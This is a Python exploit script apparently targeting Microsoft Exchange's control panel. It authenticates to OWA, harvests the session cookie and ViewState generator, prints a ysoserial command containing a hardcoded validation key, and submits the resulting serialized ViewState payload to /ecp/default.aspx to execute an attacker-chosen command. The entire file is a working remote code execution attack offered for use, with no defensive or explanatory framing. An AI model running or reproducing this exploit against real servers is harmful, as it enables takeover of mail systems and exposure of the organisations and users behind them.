#coding:utf-8
#author:Jumbo
import readline
import requests
import re
import sys
import urllib3
urllib3.disable_warnings()
from urllib.parse import quote



def Exp(url,ASP_NET_SessionId,generator_result,command):
    validationkey = 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF'
    VIEWSTATECOMMAND = 'ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="{validationkey}" --generator="{generator_result}" --viewstateuserkey="{ASP_NET_SessionId}" --isdebug –islegacy'.format(command=command,validationkey=validationkey, generator_result=generator_result,ASP_NET_SessionId=ASP_NET_SessionId)
    print('please execute \n{VIEWSTATECOMMAND}'.format(VIEWSTATECOMMAND=VIEWSTATECOMMAND))
    fuckkk = input('please write your ysoserial generate payload: ')
    fuckkk = quote(fuckkk, 'utf-8')
    expurl = 'https://{url}/ecp/default.aspx?__VIEWSTATEGENERATOR={generator_result}&__VIEWSTATE={fuckkk}'.format(url=url,generator_result=generator_result,fuckkk=fuckkk)
    print(expurl)
    expgo = s.get(expurl,verify=False)
    print(expgo.status_code)
    print('gogogoggogoggogogogogogogogogogog')

def GetSomething():
    url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    command = sys.argv[4]
    destination = 'https://' + url + '/ecp/default.aspx'
    authurl = 'https://' + url + '/owa/auth.owa'
    logindata = 'destination={destination}&flags=4&forcedownlevel=0&username={username}&password={password}&passwordText=&isUtf8=1'.format(destination=destination,username=username, password=password)
    headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded","Cookie":"PrivateComputer=true; PBack=0"}
    login = s.post(authurl, data=logindata,headers=headers,verify=False)
    logincontent = login.content
    # print(logincontent)
    ASP_NET_SessionId = login.cookies['ASP.NET_SessionId']
    if ASP_NET_SessionId:
        print('got ASP_NET_SessionId Success')
        print(ASP_NET_SessionId)
    else:
        print('got ASP_NET_SessionId Fail')
    generator_regex = b'VIEWSTATEGENERATOR" value="(.*?)"'
    try:
        generator_result = re.findall(generator_regex,logincontent)[0].decode('utf-8')
        if generator_result:
            print('got generator_result Success')
            print(generator_result)
        else:
            print('got generator_result Fail，try default')
            
    except Exception  as e:
        generator_result = 'B97B4E27'
    print(generator_result)
        



    Exp(url,ASP_NET_SessionId,generator_result,command)

s = requests.Session()
GetSomething()
